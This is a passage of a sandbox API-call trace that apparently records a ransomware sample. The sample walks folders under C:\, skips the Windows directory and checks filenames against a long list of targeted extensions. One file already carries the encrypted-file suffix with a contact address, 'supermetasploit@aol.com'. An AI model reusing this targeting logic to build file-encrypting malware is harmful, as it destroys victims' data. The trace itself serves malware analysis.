hFindFile=0x48a270) returned 1 [0283.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4000730 | out: hHeap=0x470000) returned 1 [0283.294] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf55a58a9, ftLastAccessTime.dwHighDateTime=0x1d60985, ftLastWriteTime.dwLowDateTime=0xf55a58a9, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0283.294] FindClose (in: hFindFile=0x48a1b0 | out: hFindFile=0x48a1b0) returned 1 [0283.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3ff0728 | out: hHeap=0x470000) returned 1 [0283.295] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0283.295] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x6392cc9b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6392cc9b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0283.295] lstrlenW (lpString="C:\\588bce7c90097ed212") returned 21 [0283.295] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\588bce7c90097ed212") returned 1 [0283.295] lstrlenW (lpString="588bce7c90097ed212") returned 18 [0283.295] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="588bce7c90097ed212") returned 1 [0283.296] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3ff0728 [0283.296] lstrlenW (lpString="C:\\588bce7c90097ed212") returned 21 [0283.296] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x6392cc9b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6392cc9b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName=".", cAlternateFileName="")) returned 0x48a130 [0283.321] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x6392cc9b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x6392cc9b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="..", cAlternateFileName="")) returned 1 [0283.322] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59b8ac04, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59b8ac04, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1025", cAlternateFileName="")) returned 1 [0283.322] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025") returned 26 [0283.322] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\588bce7c90097ed212\\1025") returned 1 [0283.322] lstrlenW (lpString="1025") returned 4 [0283.322] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="1025") returned 1 [0283.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4000730 [0283.323] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025") returned 26 [0283.323] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59b8ac04, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59b8ac04, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x48a1b0 [0283.326] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59b8ac04, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59b8ac04, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.326] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x594d6329, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x594d6329, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59b45016, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.326] lstrlenW (lpString="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 52 [0283.326] lstrlenW (lpString=".1cd") returned 4 [0283.326] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0283.326] lstrlenW (lpString=".3ds") returned 4 [0283.326] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0283.326] lstrlenW (lpString=".3fr") returned 4 [0283.326] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0283.326] lstrlenW (lpString=".3g2") returned 4 [0283.326] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0283.326] lstrlenW (lpString=".3gp") returned 4 [0283.326] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0283.326] lstrlenW (lpString=".7z") returned 3 [0283.326] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0283.326] lstrlenW (lpString=".accda") returned 6 [0283.326] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0283.326] lstrlenW (lpString=".accdb") returned 6 [0283.326] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0283.326] lstrlenW (lpString=".accdc") returned 6 [0283.326] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0283.326] lstrlenW (lpString=".accde") returned 6 [0283.326] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0283.326] lstrlenW (lpString=".accdt") returned 6 [0283.327] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0283.327] lstrlenW (lpString=".accdw") returned 6 [0283.327] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0283.327] lstrlenW (lpString=".adb") returned 4 [0283.327] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0283.327] lstrlenW (lpString=".adp") returned 4 [0283.327] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0283.327] lstrlenW (lpString=".ai") returned 3 [0283.327] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0283.327] lstrlenW (lpString=".ai3") returned 4 [0283.327] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0283.327] lstrlenW (lpString=".ai4") returned 4 [0283.327] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0283.327] lstrlenW (lpString=".ai5") returned 4 [0283.327] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0283.327] lstrlenW (lpString=".ai6") returned 4 [0283.327] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0283.327] lstrlenW (lpString=".ai7") returned 4 [0283.327] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0283.327] lstrlenW (lpString=".ai8") returned 4 [0283.327] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0283.327] lstrlenW (lpString=".anim") returned 5 [0283.327] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0283.327] lstrlenW (lpString=".arw") returned 4 [0283.327] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0283.327] lstrlenW (lpString=".as") returned 3 [0283.328] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0283.328] lstrlenW (lpString=".asa") returned 4 [0283.328] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0283.328] lstrlenW (lpString=".asc") returned 4 [0283.328] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0283.328] lstrlenW (lpString=".ascx") returned 5 [0283.328] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0283.328] lstrlenW (lpString=".asm") returned 4 [0283.328] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0283.328] lstrlenW (lpString=".asmx") returned 5 [0283.328] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0283.328] lstrlenW (lpString=".asp") returned 4 [0283.328] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0283.328] lstrlenW (lpString=".aspx") returned 5 [0283.328] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0283.328] lstrlenW (lpString=".asr") returned 4 [0283.328] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0283.328] lstrlenW (lpString=".asx") returned 4 [0283.328] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0283.328] lstrlenW (lpString=".avi") returned 4 [0283.328] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0283.328] lstrlenW (lpString=".avs") returned 4 [0283.328] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0283.328] lstrlenW (lpString=".backup") returned 7 [0283.328] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0283.329] lstrlenW (lpString=".bak") returned 4 [0283.329] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0283.329] lstrlenW (lpString=".bay") returned 4 [0283.329] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0283.329] lstrlenW (lpString=".bd") returned 3 [0283.329] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0283.329] lstrlenW (lpString=".bin") returned 4 [0283.329] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0283.329] lstrlenW (lpString=".bmp") returned 4 [0283.329] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0283.329] lstrlenW (lpString=".bz2") returned 4 [0283.329] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0283.329] lstrlenW (lpString=".c") returned 2 [0283.329] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0283.329] lstrlenW (lpString=".cdr") returned 4 [0283.329] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0283.329] lstrlenW (lpString=".cer") returned 4 [0283.329] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0283.329] lstrlenW (lpString=".cf") returned 3 [0283.329] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0283.329] lstrlenW (lpString=".cfc") returned 4 [0283.329] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0283.329] lstrlenW (lpString=".cfm") returned 4 [0283.329] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0283.329] lstrlenW (lpString=".cfml") returned 5 [0283.329] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0283.330] lstrlenW (lpString=".cfu") returned 4 [0283.330] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0283.330] lstrlenW (lpString=".chm") returned 4 [0283.330] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0283.330] lstrlenW (lpString=".cin") returned 4 [0283.330] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0283.330] lstrlenW (lpString=".class") returned 6 [0283.330] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0283.330] lstrlenW (lpString=".clx") returned 4 [0283.330] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0283.330] lstrlenW (lpString=".config") returned 7 [0283.330] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0283.330] lstrlenW (lpString=".cpp") returned 4 [0283.330] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0283.330] lstrlenW (lpString=".cr2") returned 4 [0283.330] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0283.330] lstrlenW (lpString=".crt") returned 4 [0283.330] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0283.331] lstrlenW (lpString=".crw") returned 4 [0283.331] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0283.331] lstrlenW (lpString=".cs") returned 3 [0283.331] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0283.331] lstrlenW (lpString=".css") returned 4 [0283.331] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0283.331] lstrlenW (lpString=".csv") returned 4 [0283.331] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0283.331] lstrlenW (lpString=".cub") returned 4 [0283.331] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0283.331] lstrlenW (lpString=".dae") returned 4 [0283.331] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0283.331] lstrlenW (lpString=".dat") returned 4 [0283.331] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0283.331] lstrlenW (lpString=".db") returned 3 [0283.331] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0283.331] lstrlenW (lpString=".dbf") returned 4 [0283.331] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0283.331] lstrlenW (lpString=".dbx") returned 4 [0283.331] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0283.331] lstrlenW (lpString=".dc3") returned 4 [0283.331] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0283.331] lstrlenW (lpString=".dcm") returned 4 [0283.331] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0283.332] lstrlenW (lpString=".dcr") returned 4 [0283.332] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0283.332] lstrlenW (lpString=".der") returned 4 [0283.332] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0283.332] lstrlenW (lpString=".dib") returned 4 [0283.332] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0283.332] lstrlenW (lpString=".dic") returned 4 [0283.332] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0283.332] lstrlenW (lpString=".dif") returned 4 [0283.332] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0283.332] lstrlenW (lpString=".divx") returned 5 [0283.332] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0283.332] lstrlenW (lpString=".djvu") returned 5 [0283.332] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0283.332] lstrlenW (lpString=".dng") returned 4 [0283.332] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0283.332] lstrlenW (lpString=".doc") returned 4 [0283.332] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0283.332] lstrlenW (lpString=".docm") returned 5 [0283.332] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0283.332] lstrlenW (lpString=".docx") returned 5 [0283.332] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0283.332] lstrlenW (lpString=".dot") returned 4 [0283.332] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0283.332] lstrlenW (lpString=".dotm") returned 5 [0283.332] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0283.332] lstrlenW (lpString=".dotx") returned 5 [0283.332] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0283.332] lstrlenW (lpString=".dpx") returned 4 [0283.332] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0283.332] lstrlenW (lpString=".dqy") returned 4 [0283.333] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".dsn") returned 4 [0283.333] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".dt") returned 3 [0283.333] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0283.333] lstrlenW (lpString=".dtd") returned 4 [0283.333] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".dwg") returned 4 [0283.333] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".dwt") returned 4 [0283.333] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".dx") returned 3 [0283.333] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0283.333] lstrlenW (lpString=".dxf") returned 4 [0283.333] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".edml") returned 5 [0283.333] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0283.333] lstrlenW (lpString=".efd") returned 4 [0283.333] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".elf") returned 4 [0283.333] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".emf") returned 4 [0283.333] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".emz") returned 4 [0283.333] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".epf") returned 4 [0283.333] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".eps") returned 4 [0283.333] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0283.333] lstrlenW (lpString=".epsf") returned 5 [0283.334] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0283.334] lstrlenW (lpString=".epsp") returned 5 [0283.334] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0283.334] lstrlenW (lpString=".erf") returned 4 [0283.334] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0283.334] lstrlenW (lpString=".exr") returned 4 [0283.334] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0283.334] lstrlenW (lpString=".f4v") returned 4 [0283.334] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0283.334] lstrlenW (lpString=".fido") returned 5 [0283.334] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0283.334] lstrlenW (lpString=".flm") returned 4 [0283.334] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0283.334] lstrlenW (lpString=".flv") returned 4 [0283.334] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0283.334] lstrlenW (lpString=".frm") returned 4 [0283.334] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0283.334] lstrlenW (lpString=".fxg") returned 4 [0283.334] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0283.334] lstrlenW (lpString=".geo") returned 4 [0283.334] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0283.334] lstrlenW (lpString=".gif") returned 4 [0283.334] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0283.334] lstrlenW (lpString=".grs") returned 4 [0283.334] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0283.334] lstrlenW (lpString=".gz") returned 3 [0283.334] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0283.335] lstrlenW (lpString=".h") returned 2 [0283.335] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0283.335] lstrlenW (lpString=".hdr") returned 4 [0283.335] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0283.335] lstrlenW (lpString=".hpp") returned 4 [0283.335] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0283.335] lstrlenW (lpString=".hta") returned 4 [0283.335] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0283.335] lstrlenW (lpString=".htc") returned 4 [0283.335] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0283.335] lstrlenW (lpString=".htm") returned 4 [0283.335] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0283.335] lstrlenW (lpString=".html") returned 5 [0283.335] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0283.335] lstrlenW (lpString=".icb") returned 4 [0283.335] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0283.335] lstrlenW (lpString=".ics") returned 4 [0283.335] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0283.335] lstrlenW (lpString=".iff") returned 4 [0283.335] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0283.335] lstrlenW (lpString=".inc") returned 4 [0283.335] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0283.335] lstrlenW (lpString=".indd") returned 5 [0283.335] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0283.335] lstrlenW (lpString=".ini") returned 4 [0283.335] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0283.335] lstrlenW (lpString=".iqy") returned 4 [0283.335] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0283.335] lstrlenW (lpString=".j2c") returned 4 [0283.336] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0283.336] lstrlenW (lpString=".j2k") returned 4 [0283.336] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0283.336] lstrlenW (lpString=".java") returned 5 [0283.336] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0283.336] lstrlenW (lpString=".jp2") returned 4 [0283.336] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0283.336] lstrlenW (lpString=".jpc") returned 4 [0283.336] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0283.336] lstrlenW (lpString=".jpe") returned 4 [0283.336] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0283.336] lstrlenW (lpString=".jpeg") returned 5 [0283.336] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0283.336] lstrlenW (lpString=".jpf") returned 4 [0283.336] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0283.336] lstrlenW (lpString=".jpg") returned 4 [0283.336] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0283.336] lstrlenW (lpString=".jpx") returned 4 [0283.336] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0283.336] lstrlenW (lpString=".js") returned 3 [0283.336] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0283.336] lstrlenW (lpString=".jsf") returned 4 [0283.336] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0283.336] lstrlenW (lpString=".json") returned 5 [0283.336] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0283.336] lstrlenW (lpString=".jsp") returned 4 [0283.336] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0283.336] lstrlenW (lpString=".kdc") returned 4 [0283.336] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".kmz") returned 4 [0283.337] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".kwm") returned 4 [0283.337] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".lasso") returned 6 [0283.337] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0283.337] lstrlenW (lpString=".lbi") returned 4 [0283.337] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".lgf") returned 4 [0283.337] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".lgp") returned 4 [0283.337] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".log") returned 4 [0283.337] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".m1v") returned 4 [0283.337] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".m4a") returned 4 [0283.337] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".m4v") returned 4 [0283.337] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".max") returned 4 [0283.337] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".md") returned 3 [0283.337] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0283.337] lstrlenW (lpString=".mda") returned 4 [0283.337] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".mdb") returned 4 [0283.337] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".mde") returned 4 [0283.337] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".mdf") returned 4 [0283.337] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0283.337] lstrlenW (lpString=".mdw") returned 4 [0283.338] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mef") returned 4 [0283.338] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mft") returned 4 [0283.338] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mfw") returned 4 [0283.338] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mht") returned 4 [0283.338] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mhtml") returned 6 [0283.338] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0283.338] lstrlenW (lpString=".mka") returned 4 [0283.338] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mkidx") returned 6 [0283.338] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0283.338] lstrlenW (lpString=".mkv") returned 4 [0283.338] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mos") returned 4 [0283.338] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mov") returned 4 [0283.338] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mp3") returned 4 [0283.338] lstrcmpiW 